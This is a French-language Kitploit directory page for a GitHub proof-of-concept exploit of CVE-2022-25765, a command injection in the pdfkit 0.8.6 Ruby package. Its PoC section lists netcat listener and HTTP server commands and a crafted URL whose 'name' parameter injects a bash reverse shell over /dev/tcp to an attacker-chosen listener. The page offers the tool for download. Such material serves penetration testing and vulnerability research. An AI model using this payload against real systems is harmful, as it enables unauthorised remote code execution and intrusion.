Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PDFkit-CMD-Injection — Exploit de preuve de concept pour CVE-2022-25765 démontrant une injection de commande dans pdfkit 0.8.6 via un paramètre d'URL non assaini, permettant l'exécution de code à distance et un reverse shell. | Kitploit
Outils/GitHubGitHub/lekosbelas/pdfkit-cmd-injection
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et Contrôle
GitHublekosbelas/pdfkit-cmd-injection

PDFkit-CMD-Injection

Exploit de preuve de concept pour CVE-2022-25765 démontrant une injection de commande dans pdfkit 0.8.6 via un paramètre d'URL non assaini, permettant l'exécution de code à distance et un reverse shell.

Voir le dépôt
12il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Injection de commande PDFkit

Détail CVE-2022-25765

Description

Le package pdfkit à partir de 0.0.0 est vulnérable à une injection de commande où l'URL n'est pas correctement assainie.

Preuve de concept

Démarrer un serveur HTTP

root@kitploit:~
1- python3 -m http.server 80

Démarrer un écouteur netcat

root@kitploit:~
2- nc -lnvp 'Target Port'

Faire une requête

root@kitploit:~
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}
Télécharger l’outil